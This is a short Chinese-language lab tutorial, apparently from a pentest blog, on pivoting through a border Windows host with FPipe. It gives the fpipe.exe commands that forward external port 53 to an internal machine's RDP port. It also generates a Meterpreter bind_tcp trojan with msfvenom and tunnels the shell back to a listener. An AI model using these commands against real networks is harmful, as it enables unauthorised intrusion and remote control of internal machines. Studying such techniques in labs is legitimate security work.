目录
0x01 FPipe介绍
0x02 端口转发
0x03 msf正向上线
注:
边界机器 win08 192.168.222.175
内网机器 win7 192.168.222.137
msf机器 Ubuntu 192.168.222.177
0x01 FPipe介绍
FPipe即forward pipe,在两个端口中间建立一个管道,来实现流量的转发,一般用于内网机器不能正常上网的情况,而且不需要考虑免杀,但是必须要有边界机器,它不仅支持TCP流量的转发,还支持UDP的。
data:image/s3,"s3://crabby-images/ab220/ab220c1eebfc4205037988a095bd0ad01bd9b14e" alt=""
0x02 端口转发
将来自外部53端口的流量,通过本地的53端口转发到内网的3389端口
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 3389 192.168.222.137
data:image/s3,"s3://crabby-images/6fb5c/6fb5ce6789e6d7484d4cc8987db0d30571d1ccae" alt=""
然后回到本地来远程连接就可以了 data:image/s3,"s3://crabby-images/cfffc/cfffce7fa0e0982b4e1e5ffd88aa802647bc333f" alt=""
data:image/s3,"s3://crabby-images/1bd31/1bd3114ea979766fa3e44d152858969f081989e9" alt=""
0x03 msf正向上线
这里我们使用bind型的payload,保证让无法正常上网的内网主机也能正常反弹shell
正常生成一个马
msfvenom -p windows/x64/meterpreter/bind_tcp lport=53 -f exe >> 123.exe
data:image/s3,"s3://crabby-images/1c1c5/1c1c5e4e5f329a61eb7c44f9593df270f3c0acb9" alt=""
之后去边界机器执行转发
fpipe.exe -l 53 -i 0.0.0.0 -s 53 -r 53 192.168.222.137
data:image/s3,"s3://crabby-images/aab83/aab83e38c7bbf50e225617c33ff328a566781002" alt=""
在内网机器上运行我们的马
data:image/s3,"s3://crabby-images/fea11/fea11e1321be380536b80b7db04b3adb7d4355b1" alt=""
回到Ubuntu上进行监听
data:image/s3,"s3://crabby-images/30f6a/30f6a3f9323a426a59510df14fcefccf5b0ccb43" alt=""
data:image/s3,"s3://crabby-images/bed3a/bed3a5f0b9d3295101f783417c24c8bb95377923" alt=""
这里的Died是生成的马有问题,之后换一下payload就可以搞定了,这个不必在意
data:image/s3,"s3://crabby-images/5c4f6/5c4f61e56079b21dd5c558284d19f8c1517bc09b" alt=""
根据实际情况来进行使用就ok了。
原作者:无心的梦呓
|